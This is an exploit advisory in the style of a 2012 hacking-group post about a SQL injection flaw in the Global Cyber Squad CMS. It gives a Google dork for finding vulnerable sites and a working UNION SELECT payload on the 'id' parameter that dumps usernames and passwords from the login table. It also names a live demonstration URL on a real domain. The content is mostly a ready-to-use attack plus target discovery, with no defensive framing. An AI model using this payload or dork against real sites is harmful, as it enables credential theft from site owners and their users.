############################################################################ # Exploit Title: Global Cyber Squad CMS SQL Injection Vulnerability # Google Dork: "Powered by: Global Cyber Squad Ltd" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.ghananie.com/ # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ ================================== [+] id Vulnerable to sqli [+] +union+select+concat(username,0x3a,password),2,3,4,5,6,7+from+login-- D3m0: http://www.ghananie.com/eventdetails.php?id=5 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369